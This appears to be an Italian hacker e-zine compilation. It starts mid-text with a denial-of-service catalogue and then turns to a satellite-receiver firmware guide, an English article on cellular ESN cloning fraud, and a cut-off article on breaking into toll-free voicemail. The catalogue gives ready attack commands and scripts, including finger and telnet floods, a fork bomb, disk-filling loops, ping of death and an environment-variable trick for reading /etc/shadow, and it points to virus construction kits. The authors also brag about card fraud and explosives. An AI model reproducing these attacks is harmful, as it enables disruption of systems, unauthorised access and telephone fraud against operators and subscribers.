in alcuni casi buono) algoritmo abbastanza veloce. Per Solaris 2.X misurato e riportato con il comando sar quanta memoria del kernel sta usando il sistema, ma per SunOS 4.X non c' quel comando. Ci significa che sotto SunOS 4.X non avrai un avviso. Se usi Solaris devi scrivere sar -k 1 per avere le informazioni. netstat -k pu essere usato e mostra quanta memoria il kernel ha allocata. .B.4. RAM --------- Un attacco denial of service che alloca una grande quantit di RAM pu causare una grande quantit di problemi. I servers NFS e di posta sono attualmente estremamente sensibili perch non hanno bisogno di molta RAM e spesso non hanno molta RAM. Un attacco a un server NFS banale. Il normale client NFS far una grande quantit di caching, ma un clent NFS pu includere comunque il programma che hai scritto tu... .B.5. DISCHI ------------ Un attacco classico riempire l'hard disk, ma un attacco ai dischi pu fare molto di pi. Per esempio un disco sovraccaricato pu essere manomesso in molti modi. .B.6. CACHE ------------ Un attacco denial of service che coinvolge la cache pu essere basato su un metodo per bloccare la cache o per annullarla. Queste cache sono trovte su Solaris 2.X: Directory name lookup cache: Associa il nome di un file con un vnode. Inode cache: Deposita le informazioni lette da un disco se sono ancora necessarie. Rnode cache: Raccoglie informazioni sul filsystem NFS. Buffer cache: Collega i blocchi e i cilindri con il disco I/O. .B.7. INETD ----------- Una volta che inetd andato in crash tutti gli altri servizi che sono eseguiti attraverso inetd non funzioneranno pi. .C. ATTACCARE DALL'ESTERNO ~~~~~~~~~~~~~~~~~~~~~~~~~~ .C.1. AVERE PROFITTO CON IL FINGER ---------------------------------- La maggior parte delle installazioni del fingerd supportano i reindirizzamenti agli altri gost. Es: $finger @system.two.com@system.one.com il finger nell'esempio andr attraverso system.one.com a system.two.com. Cos system.two.com sa che system.one.com che fa il finger. Cos questo metodo pu essere usato per nascondersi, ma anche per un attacco denial of service. Guarda qu: $ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack Tutti quei segni @ faranno un finger a host.we.attack una, due, tre ... volte. L'effetto su host.we.attack potente e il risultato grande frequenza, poca memoria libera e hard disk con poco spazio libero, dovuto a tutti i processi figli (confronta con .D.5.). La soluzione installare un fingerd che non supporta i reindirizzamenti, per esempio GNU finger. Puoi anche eliminare il servizio finger, ma penso che un po' troppo. .C.2. UDP E SUNOS 4.1.3. ------------------------ SunOS 4.1.3. si avvia se un pacchetto con un'informazione non corretta nell'header mandata ad esso. Questa l causa se l'ip_options indica una dimensione sbagliata del pacchetto. La soluzione di installare la patch appropriata. .C.3. BLOCCARE UP X-WINDOWS --------------------------- Se un host accetta una sessione telnet alla porta di X-Windows (generalmente una porta tra 6000 e 6025. Nella maggior parte dei casi 6000) potrebbe essere usata per bloccare il sistema X-Windows. Questo pu essere fatto con molte connessioni telnet alla porta o con un programma che manda molti XOpenDisplay() alla porta. La stessa cosa pu accadere a Motif o Open Windows. La soluzione di negare le connessioni alla porta X-Windows. .C.4. USO MALIZIOSO DEI SERVIZI UDP ----------------------------------- E' semplice avere i servizi UDP (echo, time, daytime, chargen) da far andare in loop, a causa di banali IP-spoofing. L'effetto pu essere alta frequenza che causa l'inutilit della rete. Nell'esmpio l'header richiede che il pacchetto viene da 127.0.0.1 (loopback) e l'obiettivo la porta echo di system.we.attack. Siccome system.we.attack conosce 127.0.0.1 il collegamento stato stabilito. Es: from-IP=127.0.0.1 to-IP=system.we.attack Packet type:UDP from UDP port 7 to UDP port 7 Nota che il nome system.we.attack sembra un nome DNS, ma l'obiettivo dovrebbe essere sempre rappresentato dall'IP. Citazione dal commento di proberts@clark.net (Paul D. Robertson) su comp.security.firewalls sul tema di "Introduzione ai denial of service" " Una grande quantit di sistemi non mettono loopback sulla rete, e semplicemente li emulano. Quindi, questo attacco avr l'effetto desiderato sulla macchina solo in alcuni casi. E' molto meglio usare l'indirizzo di una differente macchina sulla stessa rete. Ancora, i servizi standard dovrebbero essere disabilitati in inetd.conf. Altri attacchi per stacks di IP che non supportano ICMP, il servizio echo non usato da molti programmi, e TCP echo dovrebbe essere usato al posto di UDP dove necessario ". .C.5. ATTACCARE CON CLIENTS LYNX -------------------------------- Un server Worold Wide Web inforcher un processo httpd come una risposta a una richiesta da un client, spesso Netscape o Mosaic. Il processo dura meno din un secondo e il caricamento non sar mai mostrato se qualcuno usa ps. Nella maggior parte dei casi comunque sicuro eseguire un attacco denial of service che usa molti clients W3, di solito clients lynx. Ma nota che il comando netstat potrebbe essere usato per rintracciare l'attacco (grazie a Paul D. Robertson). Alcuni httpd (per esempio http-gw) hanno problemi normalmente con la frequenza alta, poca memoria... E l'attacco pu in quei casi far andare in loop il server. (confronta con .C.6.) .C.6. USO MALIZIOSO DI telnet ----------------------------- Studia questo piccolo script: while : ; do telnet system.we.attack & done Un attacco che usa questo script potrebbe mangiare della frequenza, ma non ha niente a che vedere con il metodo finger o altri metodi. Il punto che alcuni comuni firewall e httpd pensano che l'attacco un loop e lo annullano, fino a che l'amministratore non manda un kill -HUP. Questa una semplice vulnerabilit ada alto rischio che dovrebbe essere controllata e se presente riparata. .C.7. USO MALIZIOSO DI telnet SU SOLARIS 2.4 --------------------------------------------- Se l'attacco fa una connessione telnet all'host Solaris 2.4 e quit si usa: Control-} quit inetd lo terr per sempre. Un paio di centinaia... La soluzione installare la patch appropriata. .C.8. COME DISABILITARE GLI ACCOUNTS ------------------------------------ Alcuni sistemi disabilitano un account dopo alcune login sbaglite, o aspettano alcuni secondi. Tu puoi usare questa funzione per cacciare gli utenti dal sistema. .C.9. LINUX E TCP TIME, DAYTIME ---------------------------------- Si sa che inetd sotto Linux va in crach se troppo pacchetti SYN sono mandati a daytime (porta 13) e/o a time (porta 37). La soluzione installare la patch appropriata. .C.10. COME DISABILITARE I SERVIZI ---------------------------------- La maggior parte dei sistemi Unix disabilitano i servizi dopo un certo numero di sessioni aperte in un certo periodo di tempo. La maggior parte dei sistemi hanno uno standard ragionevole (diciamo 800-1000), ma non alcuni sistemi SunOS che hanno lo standard a 48... La soluzione settare il numero in qualcosa di ragionevole. .C.11. PARAGON OS BETA R1.4 --------------------------- Se qualcuno reindirizza un pacchett ICMP (Internet Control Message Protocol) a un paragon OS beta R1.4 la macchina si bloccher e deve essere riavviata. Un reindirizzo di ICMP dice al sistema di sostituire le tavole di routing. I router usano questo per dire all'host che sta mandando il pacchetto a un router sbagliato. La soluzione installare la patch appropriata. .C.12. FTP DI NOVELLS NETWARE ----------------------------- Il server FTP di Novells Netware conosciuto poich la memoria si riduce se ci sono molte sessioni ftp connesse. .C.13. ATTACCHI CON REINDIRIZZAMENTO DI ICMP -------------------------------------------- Le Gateways usano il reindirizzamento di ICMP per dire al sistema di cambiare le tavole di routing, cio sta dicendo al sistema di prendere una via migliore. Per manomettere il reindirizzo degli ICMP dobbiamo conoscere una connessione esistente (ne possiamo creare una per noi stessi, ma non c' molto utilizzo per quella). Se abbiamo trovato una connessione noi possiamo mandare un flusso che gli fa perdere la connessione o potremmo mandare falsi messaggio all'host se la connesione che abbiamo trovato non cripta i pacchetti. Es: (messaggio falso da mandare) DESTINATION UNREACHABLE TIME TO LIVE EXCEEDED PARAMETER PROBLEM PACKET TOO BIG L'effetto di tale messaggio il blocco della connessione. La soluzione potrebbe essere disabilitare il reindirizzamento di ICMP, non usato propriamente dal servizio. .C.14. TEMPESTE DI BROADCAST ---------------------------- Questo un metodo molto popolare nelle reti dove tutti gli host agiscono come gateways. Ci sono molte versioni dell'attacco, ma il metodo di base mandare molti pacchetti a tutti gli host nella rete con una destinazione che non esiste. Ogni host cercher di inoltrare ogni pacchetto cos i pacchetti rimbalzeranno per molto tempo. E se si aggiungono i nuovi pacchetti alla rete, la rete sar nei guai. I servizi che possono essere manomessi e utilizzati in questo tipo di attacco sono per esempio il ping, il finger e il sendmail. Ma possono essere manomessi la maggior parte dei servizi in un modo o nell'altro. .C.15. EMAIL BOMBING E SPAMMING ------------------------------- In un attacco email bombing l'attaccante mander ripetutamente identici messaggi email a un indirizzo. L'effetto sull'obiettivo alta frequenza, un hard disk con poco spazio e cos via... L'email spamming quando si mandano delle mail a tutti (o quasi) gli utenti del sistema. Il motivo per il quale si usa lo spamming al posto del bombing che alcuni utenti cercano di mandare una risposta e se l'indirizzo falso, la mail torner indietro. In quel caso una mail si trasformata in tre mail. L'effetto sulla frequenza ovvio. Non c' modo di prevenire un email bombing o spamming. Comunque dai un'occhiata al documento della CERT "Email bomginb and spamming". .C.16. TIME E KERBEROS ---------------------- Se le macchine sorgente e obiettivo sono allineate da vicino il biglietto verr respinto, ci significa che se il protocollo che setta il tempo protetto sar possibile settare un server kerberos. .C.17. IL BUG DOT DOT --------------------- Il sistema di condivisione file di Windows NT vulnerabile al famoso bug dot dot sotto Windows 95. Ci significa che chiunque pu mandare in crash il sistema. Se qualcuno manda un "DIR ..\" alla workstation un messaggio di STOP apparir sullo schermo del computer Windows NT. Nota che applicabile alle versioni 3.50 e 3.51 per le versioni sia workstation che server. La soluzione installare la patch appropriata. .C.18. KERNEL PANIC DEL SUNOS ----------------------------- Alcuni sistemi SunOS (che eseguono TIS?) avranno un kernel panic se mandato un getsockopt(). La connessione cos sar interrotta. La soluzione potrebbe essere installare la Sun Patch 100804. .C.19. APPLETS OSTILI --------------------- Una applet ostile quando un applet cerca di usare il tuo sistema in un modo inappropriato. I problemi nel linguaggio java potrebbero essere ordinati in due grandi gruppi: 1) Problemi dovuti ai bugs. 2) Problemi dovuti a caratteristiche nel linguaggio. Nel primo gruppo abbiamo per esempio il bug java bytecode verifier, che permette a un'applet di eseguire tutti i comandi che un utente potrebbe eseguire. Ci significa che tutti i metodi di attacco descritti in .D.X. possono essere seguiti attraverso un'applet. Il bug java bytecode verifier fu scoperto a fine Marzo 1996 e non ci sono patch disponibili (correggetemi se sbaglio!). [NdT siccome il documento un po' vecchio, probabilmente ora esiste una patch per questo bug] Nota che due altri bugs possono essere inseriti nel primo gruppo ma sono entrambi riparati in Netscape 2.01 e JDK 1.0.1. Il gruppo due pi interessante e una grande problema il fatto che java pu connettersi alle porte. Ci significa che tutti i metodi descritti in .C.X. possono essere eseguiti da un'applet. Maggiori informazioni ed esempio possono essere trovati all'indirizzo: http://www.math.gatech.edu/~mladue/HostileArticle.html Se hai bisogno di un maggior livello di sicurezza usa dei firewall che proteggono da java. Come utente, dovresti aver disabilitato java. .C.20. VIRUS ------------ I virus per il computer sono scritti allo scopo di distruggere e propagare i sistemi. I virus sono ancora il metodo d'attacco denial of service pi diffuso. Non vero che scrivere virus difficile. Se conosci il linguaggio assembly e hai alcuni codici sorgente di virus facile. Si possono scaricare degli strumenti per la costruzione di virus, per esempio: * Genvir. * VCS (Virus Construction Set). * VCL (Virus Construction Laboratory). * PS-MPC (Phalcon/Skism - Mass Produced Code Generator). * IVP (Instant Virus Production Kit). * G2 (G Squared). PS-MPC e VCL sono i migliori e possono aiutare il programmatore novello a capire come scrivere un virus. Si pu trovare anche uno strumento chiamato MtE. MtE trasformer un virus in un virus "mutevole". Il motore mutevole di MtE noto e pu essere rintracciato da un antivirus. .C.21. ABUSO DI FTP ANONIMO --------------------------- Se un archivio FTP anonimo ha un'area scrivibile pu essere manomesso per un attacco denial of service simile a quello .D.3. Noi cos possiamo riempire l'hard disk. Un host inoltre pu essere temporanemante inaccessibile a causa di eccessive richieste FTP. Pe maggiori informazioni su come proteggere un FTP anonimo, il documento della CERT "Anonymous FTP Abuses" potrebbe essere un buon punto d'inizio. .C.22. SYN FLOOD ---------------- Sia 2600 e Phrack hanno pubblicato informazioni sull'attacco syn flood. 2600 ha anche pubblicato un exploit per l'attacco. Come sappiamo il pacchetto syn usato in un handshake di 3 fasi. L'attacco syn flood basato su un incompleto handshake. L'host che attacca mander un flusso di pacchetti syn ma non risponer con un pacchetto ACK. Lo stack TCP/IP aspetter un certo periodo di tempo prima di interrompere la connessione, cos un attacco syn flood manterr quindi la connessione tcp_received in coda della macchina colpita. L'attacco syn flood molto buono ed facile trovare maggiori informazioni su di esso, per esempio: [.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html Articolo di Christopher Klaus che include una "soluzione". [.2.] http://jya.com/floodd.txt 2600, Estate, 1996, pp. 6-11. FLOOD WARNING di Jason Fairlane [.3.] http://www.fc.net/phrack/files/p48/p48-14.html IP-spoofing Demystified by daemon9 / route / infinity per Phrack Magazine .C.23. PING FLOOD ----------------- Non testato quanto pu essere grande un attacco ping flood, ma potrebbe essere abbastanza grande. Sotto Unix possiamo trovare qualcosa come: ping -s host per mandaer pacchetti di 64 bytes. Se hai Windows 95, clicca sul pulsante Avvio, poi su Esegui e poi scrivi: PING -T -L 256 xxx.xxx.xxx.xx. Eseguilo circa 15 volte contemporaneamente. .C.24. MANDARE IN CRASH I SISTEMI CON IL PING DI WINDOWS 95 ----------------------------------------------------------- Se qualcuno pu pingare la tua macchina da una macchina Windows 95 eglio pu resettare o bloccare la tua macchina. L'attaccante scrive semplicemente: ping -l 65510 address.to.the.machine E la macchina si bloccher o si riavvier. Funziona con il kernel 2.0.7 fino alla versione 2.0.20 e 2.1.1 per Linux (crash). AIX4, OSF, HPUX 10.1,DUnix 4.0 (crash). OSF/1, 3.2C, Solaris 2.4 x86 (riavvio). .C.25. USO MALIZIOSO DEL MESSAGGIO DI RISPOSTA DELLE SUBNET MASK ---------------------------------------------------------------- Il messaggio di riposta delle subnet mask usato al riavvio, ma alcuni hosts accettano il messaggio ogni volta senza controllare. In questo modo tutte le comunicazioni a o dall'host sono interrotte. L'host non dovrebbe accettare il messaggio sempre ma solo durante il riavvio. .C.26. FLEXlm ------------- Ogni host che esegue FLEXlm ha la FLEXlm license manager daemon su ogni rete che per spegnere usano il comando FLEXlm lmdown. # lmdown -c /etc/licence.dat lmdown - Copyright (C) 1989, 1991 Highland Software, Inc. Shutting down FLEXlm on nodes: xxx Are you sure? [y/n]: y Shut down node xxx # .C.27. PARTIRE CON FTP BANALI ----------------------------- Per partire con workstation senza disco si usa un ftp banale con rarp o bootp. Se un attaccante non protetto pu usare tftp per avviare l'host. .D. ATTACCARE DALL'INTERNO ~~~~~~~~~~~~~~~~~~~~~~~~~~ .D.1. KERNEL PANIC SOTTO SOLARIS 2.3 ------------------------------------ Solaris 2.3 avr un kernel panic se eseguito questo: $ndd /dev/udp udp_status La soluzione installare la patch appropriata. .D.2. MANDARE IN CRASH IL SERVER X ---------------------------------- Se stickybit non settato in /tmp, il file /tmp/.x11-unix/x0 pu essere rimosso e il server X andr in crash. Es: $ rm /tmp/.x11-unix/x0 .D.3. RIEMPIRE L'HARD DISK -------------------------- Se lo spazio sul tuo hard disk non limitato o se puoi usare /tmp possibile riempire il file system. Es: while : ; mkdir .xxx cd .xxx done .D.4. USO MALIZIOSO DI eval --------------------------- Alcuni vecchi sistemi andranno in crash se eseguito eval '\!\!' in una C-shell. Es: % eval '\!\!' .D.5. USO MALIZIOSO DI fork() ----------------------------- Se qualcuno esegue questo programma C++ il risultato sar il crash della maggior parte dei sistemi. Es: #include #include #include main() { int x; while(x=0;x<1000000;x++) { system("uptime"); fork(); } } Puoi usare tutti i comandi che vuoi, ma uptime bello perch mostra il carico di lavoro. Per avere un attacco pi grande e potente dovresti comunque rimpiazzare uptime con sync. Questo molto cattivo. Se fai sul serio puoi instaurare un processo "figlio" per ogn processo "figlio" e avremo un incremento del carico di lavoro. Non ci sono buoni modi di fermare questo attacco e attacchi simili. Una soluzione potrebbe essere piazzare un limite di tempo sull'esecuzione e dimensione dei processi. .D.6. CREARE FILES CHE SONO DIFFICILI DA RIMUOVERE -------------------------------------------------- Tutti i files possono essere rimossi, ma qu c' qualche idea: Es.1. $ cat > -xxx ^C $ ls -xxx $ rm -xxx rm: illegal option -- x rm: illegal option -- x rm: illegal option -- x usage: rm [-fiRr] file ... $ Es.2. $ touch xxx! $ rm xxx! rm: remove xxx! (yes/no)? y $ touch xxxxxxxxx! $ rm xxxxxxxxx! bash: !": event not found $ Altri metodi conosciuti sono files con caratteri dispari o spazi nel nome. Questi metodi potrebbero essere usati in combinazione con ".D.3. RIEMPIRE L' HARD DISK". Se vuoi rimuovere questi files devi usare degli script o un'interfaccia grafica come il File Manager di OpenWindow. Puoi anche tentare di usare: rm ./. Dovrebbe funzionare per il primo esempio se hai una shell. .D.7. DIRECTORY NAME LOOKUPCACHE -------------------------------- Directory name lookupcache (DNLC) usato quando un file aperto. DNLC associa il nome del file a un vnode. Ma DNLC pu solo operare su files i quali nomi sono composti da un certo numero di caratteri (per SunOS 4.x fino a 14 caratteri, per Solaris 2.x fino a 30 caratteri). Questo significa che facile eseguire un discreto attacco denial of service. Crea diciamo 20 directory (per iniziare) e metti 10 files vuoti in ogni directory. Fai s che ogni nome di file abbia oltre i 30 caratteri ed esegui uno script che fa molti ls-al nelle directory. Se l'impatto non grande abbastanza, dovresti creare pi files o eseguire pi processi. .D.8. ATTACCO CSH ----------------- Esegui questo in /bin/csh (dopo le modifiche appropriate) e il livello di caricamento salir di molto (100% del tempo della cpu) in poco tempo. |I /bin/csh nodename : **************b .D.9. CREARE FILES IN /tmp -------------------------- Molti programmi creano files in /tmp, ma difficile trattare del problema se il file esiste gi. In alcuni casi questo potrebbe essere usato per un attacco denial of service. .D.10. USARE RESOLV_HOST_CONF ----------------------------- Alcuni sistemi hanno un piccolo buco di sicurezza nel modo in cui usano la variabile RESOLV_HOST_CONF. Noi possiamo mettere delle cose in esso e attraverso l'accesso ping avremo dei dati come /etc/shadow o potremo mandare in crash il sistema. La maggior parte dei sistemi andranno in crash se c' /proc/kcore nella variabile e accedendo tramite ping. Es: $ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf .D.11. SUN 4.X E LAVORI NASCOSTI -------------------------------- Grazie a Mr David Honig per il documento seguente: " Metti la stringa "a&" in un file chiamato "a" e esegui un "chomod +x a". Eseguendo "a" disattiverai lentamente una macchina SunOS 4.x, disabilitando anche il login root e riempiendo le tavole del kernel." " La cosa bella la dimensione dello script, e quante poche battute di tasti ci vogliono per disattivare una macchina Sun come utente". .D.12. MANDARE IN CRASH DG/UX CON ULIMIT ---------------------------------------- ulimit usato per settare un limite sulle risorse di sistema disponibili alla shell. Se ulimit 0 chiamato prima di /etc/passwd, sotto DG/UX, il file passwd sar settato a 0. .D.13. NETTUNE E HP-UX ---------------------- /usr/contrib/bin/nettune SETUID root su HP-UX, cio ogni utente pu resettare tutti gli ICMP, IP e i parametri TCP del kernel, per esempio i seguenti parametri: - arp_killcomplete - arp_killincomplete - arp_unicast - arp_rebroadcast - icmp_mask_agent - ip_defaultttl - ip_forwarding - ip_intrqmax - pmtu_defaulttime - tcp_localsubnets - tcp_receive - tcp_send - tcp_defaultttl - tcp_keepstart - tcp_keepfreq - tcp_keepstop - tcp_maxretrans - tcp_urgent_data_ptr - udp_cksum - udp_defaultttl - udp_newbcastenable - udp_pmtu - tcp_pmtu - tcp_random_seq La soluzione potrebbe essere settare il permesso appropriato a /sbin/mount_union: #chmod u-s /sbin/mount_union .D.14. SOLARIS 2.X E NFS ------------------------ Se un processo sta scrivendo a NFS e l'utente supera lo spazio sul disco il processo andr in un loop infinito. .D.15. STABILIT DEL SISTEMA COMPROMESSA DA MOUNT_UNION ------------------------------------------------------- Eseguendo una sequenza di comandi mount_union ogni utente pu causare un "ricaricamento" del sistema su tutti i FreeBSD 2.x prima del 18/05/1996. $ mkdir a $ mkdir b $ mount_union ~/a ~/b $ mount_union -b ~/a ~/b La soluzione potrebbe essere settare il permesso appropriato in /sbin/mount_union: #chmod u-s /sbin/mount_union .D.16. trap_mon CAUSA KERNEL PANIC SOTTO SUNOS 4.1.X ---------------------------------------------------- Eseguendo l'istruzione trap_mon da utente si pu causare un kernel panic o un "window underflow watchdog reset" sotto SunOS 4.1.x, architettura sun4c. .E. DUMPING CORE ~~~~~~~~~~~~~~~~ .E.1. BREVE COMMENTO ------------------- I core dumps non appartengono in realt a questo documento ma li ho messi comunque. .E.2. USO MALIZIOSO DI NETSCAPE ------------------------------- Sotto Netscape 1.1N questo collegamento causer un segmentation fault e un core dump. <--- synarckio1@yahoo.it ---> <---------- w w w . h a c k e r s a t . x s 3 . c o m ---------> ISTRUZIONI PER L'AGGIORNAMENTO DEL RICEVITORE HUMAX IRCI-5400 Per effettuare l'aggiornamento sono necessari: - software WDN4OAK - file *.hdf (NB verificare la versione del proprio loader (L o H) e scricare il file apposito) - cavo seriale femmina/femmina null modem semplificato in base al seguente schemino Pin ricev. Pin PC ---------- ------ 2 <--------> 3 3 <--------> 2 5 <--------> 5 Se preparate il cavo da soli verificate che non ci siano pin in corto. Durante l'operazione, per precauzione, - togliere la smart card e le eventuali cam - chiudere ogni programma in esecuzione in background (es.antivirus) 1) tenendo il 5400 in posozone si stand-by, attaccare il pc al ricevitore con il cavo null-modem; 2) Avviare il programma WDN4OAK, impostate la porta COM, il collegamento a 115.200 bps, selezionate il file (*.hdf); 4) Cliccare su GO e accendere il ricevitore da telecomando Se tutto e' andato bene iniziera' subito il download (il cui avanzamento indicato da un mumero progressivo sul display). Se il download non parte nel giro di 2-3 secondi potete cliccare pure su STOP perche' c'e' qualcosa che non e' andato bene. Provate a diminuire progressivamente la velocita' di collegamento, cioe' fate delle prove con tutte le velocita' riportate: 115.200 57.600 38.400 19.200 9.600 Attenzione all'alimentazione, il pericolo durante queste operazioni e' che parta la corrente ed allora sarebbero veramente dei problemi. ===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Phreaking=--====ooO===0===Ooo===oOOo===ooO===0=== CELLULAR TELEPHONE ESN EMULATION -------------------------------- The term "Emulation" is used to describe the process of making two, or more, phones look alike to the cellular system. A basic understanding of the terms NAM and ESN is required before proceeding. NAM or "Number Allocation Module" is the term used to describe a cellular telephone's dealer programmable system parameters. These parameters include the users telephone number and other settings required to identify the phone to the cellular system. Older phones use an PROM chip that has to be programed or "burnt" using an PROM programmer. On all newer phones the NAM information can be re-programed at will from the handset be anyone possessing the relevant programing instructions, and in some cases a programming or "password" adaptor. ESN or "Electronic Serial Number" is the term used to describe a cellular telephones "un-alterable" fingerprint and is programed into the phone by the manufacturer. The ESN is commonly expressed as an eleven digit decimal, or eight digit hex number. The decimal format includes a three digit manufacturers identification and an eight digit unique serial number, the hex format includes a two digit manufacturers identification and a six digit unique serial number. When combined the NAM and ESN provide the cellular carriers a way of identifying the phone and determining whether to allow the phone to place a call. Whenever the phone is used it transmits this information to the cellular switch where it is compared to a data base of current subscribers. If the system recognizes the phone as being an out of area, or "roaming", subscriber a check is made with the home system. This check is either made during the first call, or more commonly these days before the first call is completed. CELLULAR FRAUD -------------- In the past it was often possible for hackers to change the ESN and NAM information and make one call before the system locked the unit out. The NAM and ESN information would be changed and another call could be completed. This is known as ESN "Tumbling" and over the last few years the Cellular Carriers have lost millions of dollars to this scam. It has been estimated that at the height of tumbling in New York City up to 30% of calls placed were fraudulent. To change the ESN the hacker would generally remove the phone's ESN chip and install a socket to take an easily reprogramable EPROM chip, the ESN could then be reprogramed at will. More recently people have reverse engineered certain manufacturer's software to allow simple reprograming using a lap top computer connected to the phone's data port. The Cellular industry has reacted to this in various ways. Initially the simple way to prevent tumbling was to ban all roaming customers from direct dialing, legitimate callers had to pre-register using a credit card to guarantee payment. Newer advanced software allows pre-screening of callers information and has now all but eliminated tumbling. In most service areas the ESN and NAM information is checked on power up or as soon as the SEND button is pressed, prior to allowing the completion of the call. The Cellular hackers have now turned to other ways of making fraudulent calls. The most common of these is to obtain a legitimate subscriber's telephone number and ESN and re-program a phone with this information, therefore making an exact clone able to make (and receive) phone calls. This method allows anything from a few days to a full month of "free" calls, and can go on indefinitely if the cloned number is a corporate account as executive's phone bills are rarely questioned. LEGAL EMULATION --------------- The above illegal cloning of subscriber's cellular telephones and the reverse engineering of manufacturer's software has been adapted by a number of legitimate companies. It is now possible to have more than one phone per cellular telephone number. Several companies are now offering legal cloning or emulation where for a fee of around $200-$300 they will program your second phone with the ESN of your currently active phone. To avoid fraud these companies often ask for a copy of a current cellular telephone bill showing the mobile number and subscribers name. This is then compared with picture ID to insure that the customer is a legitimate bill paying subscriber. Once a phone has been emulated the following should be noted: 1. If an attempt is made to use both phones at the same time and in the same system one of the following will occur: OUTGOING CALLS - First call will complete as normal, second phone will get a fast busy, system deny recording, or call will drop. INCOMING CALLS - Both phones may ring and call can be answered but might immediately drop. Strongest signal may ring and call can be answered. Neither phone will ring. 2. If one phone is in the home market and one is roaming both phones should work and it should be possible to call your own number. This depends on the roaming agreement between the two systems. In systems with "Automatic Roaming" or "Super Access" agreements it may be necessary to turn off the auto call forwarding to avoid problems, dial * O F F SEND in many locations. 3. If both phones are roaming in DIFFERENT systems do NOT attempt to have both phones turned on at the same time as your home system will probably generate a roam fraud message and CUT THE PHONE OFF! 4. If the secondary (cloned) phone is stolen call the carrier and have the mobile number changed, re-program the primary phone with the new number. Do not report the phone stolen as the ESN will be locked out and neither phone will work. If you know the secondary phone's ORIGINAL ESN report this as stolen and tell the carrier that the phone was not active. Nine times out of ten if the thief tries to activate the phone the hardware serial number (assumed to be the correct ESN) will be checked on the deny list and service will be denied. If the original ESN has not been reported stolen and the phone is activated using the hardware serial number the phone won't work as the ESN is incorrect! If the "correct" emulated ESN is read from the phone service will probably be denied if the thief tries to activate the phone on the same home system as the primary phone. This is because many systems do not allow two numbers on one ESN. The thief could activate service on an alternate system. You could prevent the emulated phone from working by having the ESN in the primary phone emulated to another phone, you can then report the phone's ESN as stolen. This is not recommended as using a phone with a stolen ESN would cause problems if you ever need to use the original ESN. Remember that legitimate emulation does not remove the original ESN, it simply adds some code to make the phone appear to have a different ESN. 5. If the primary phone is stolen you can report the theft, then have the secondary phone's ESN changed back to it's original or re programed to match another phone. This will usually be done for a nominal charge. As of April 1993 California Grapevine Communications offers ESN emulation for the following phones (call for latest list): AUDIOVOX: - 832, 832A, 1000, 4200A BC - 40, 45, 55, 55A, 65A, 410. CMT - 300A, 400, 405, 410A, 420, 450, 550, 600, 605, 750, 1700. CTR - 420A, 1900, 2000, CTX - 1500, 2500, 3100A, 3200A, 4000, 4100A PRT - 200 SP - 85, 85A, 95, TRANS - 420 NEC: 3700, 3800, 4000 M3800, M4500, M4600, M4700, M4800 P200, P300, P301 P9000, P9100 NOVATEL: 8300, 8301, 8305, 8305A, 8320, 8320A PTR825 PANASONIC: EB2500, EB2501 (TP500, 501) PIONEER: SEE MOTOROLA MOTOROLA: ALL MOBILES, TRANSPORTABLES AND BAG PHONES. ALL FLIPS, 8000 SERIES AND ULTRA CLASSICS PRIOR TO VERSION 9121. NO MICROTAC LITE'S (YET) TECHNOPHONE: MC905, MC905MKII/985/995 THE FOLLOWING MUST BE EMULATED TO SAME BRAND: SHINTOM, UNIDEN, GE The price for Emulation is $199.00 (mention this software) plus shipping. Proof of ID, valid Cellular account and social security number are required. Please call or write for further information. 25082 LUNA BONITA DRIVE, LAGUNA HILLS, CA, 92653 TEL: (714)643-8426 FAX: (714)643-8379 COPYRIGHT 1993 CALIFORNIA GRAPEVINE COMMUNICATIONS -+-+-+-+-+-+---+-+-+-+-+-+-+-+-+-+-+-+sYn^ ringrazio la california corporation!!!! SEGRETERIE TELEFONICHE Autore: mR_bIs0n Consumo: merendine e panini farciti alla nutella... Musika askoltata: vari mp3 direttamente dal mio MPMan... uahhhh 180 karte!!! Saluti a: Panino, Luigi, Biby, Carmine, Meriak, Mr_Skull, Piccinni, Pr0digY, e tutti quelli della mailing di Spaghetti Phreakers... Dedicato a: Daniela ke si trovato uno scemo di ragazzo di 1 ke le fa le corna... Ilaria ke si trovato uno scemo di 3 ke le fa le corna (1aggiornamento: SI E'LASCIATAAAAAAAAAAAAAAA KOME GODOOOOOOOOO) (2aggiornamento: si messa con uno stronzo di 1... bene... tutte quelle giornate passate a costruire esplosivi serviranno finalmente a qualkosa)... alle altre tre Ilarie (una di Roma, una amika della sorella di Skull e una amika di una mia amika di skuola...) Fankulo a: tutti i falsi hackers e phreakers, prof.essa di Latino e infine a quelli di CalcioMania ke non accettato il mio ordine con carta di credito di soli 7 milioni... uffa ci tenevo ai completi Casa/Trasferta/Coppa della Lazio... cmq... ********** * So'Mario * (cio "sono Mario") ********** * (1)Intro * * (2)Dove reperire le segreterie * * (3)Le segreteire * * (4)Come agire * * (5)Una volta indiviuata * * (6)Cosa ne faccio??? * * (7)I riski * * (8)Ne potevi fare a meno??? * * Una nota preziosa sull'autore * - 01 - Intro Bene bene... ci risentiamo dopo tanto tempo... ma sapete... stata dura trovare un'altra rivista ke mi ospitasse... vabb bando alle ciance (mamma mia ke fastidio ke mi da'questa frase...) ho voluto scrivere quest'artikolo per fare un po'di luce sulle segreterie telefonike su numero verde... spero vi sia utile... - 02 - Dove reperire le segreterie Una kosa molto importante quella di trovare del materiale utile per reperire numeri verdi e di conseguenza segreterie telefonike... allora vi potrebbero servire: - giornali del tipo: "Famiglia Puttana"... cio "Famiglia Cristiana"... "Grazia"... - giornalacci porno direte voi, vero? ne dubito... comunque visto ke ci tenete vi lascio dei titoli... "Super Joint", "Selen, Puledra in calore", "Grande e Calda"... - le Pagine Gialle della Seat... possiamo trovare tanti bei numeretti di ditte e aziende... - le Pagine Utili della Mondadori... anke l possibile trovare numeri utili... - l'elenko telefoniko cos vasto di numeri ke diventa difficile trovare ci ke ci serve... cmq... Una volta ke avete un po'di roba potete iniziare a fare le prove per trovare il numero con la segreteria da sverginare... ma prima... - 03 - Le segreterie Esistono vari tipi di segreterie... possiamo dividerle in segreterie a mono casella (es. le segreterie Memotel) e a multi casella(es. Meridian della Northen Telekom)... bene vediamo le caratteristike... le segreterie a mono casella vocale sono delle segreterie molto meno evolute ma pi- semplici da usare... infatti con le segreterie tipo Memotel c' un solo "padrone" della segreteria perk esiste appunto una sola casella da governare... ci vuol dire ke potete settare il messaggio di benvenuto e quando kiameranno il numero, ki vi kiamer, ascolter subito la vostra voce 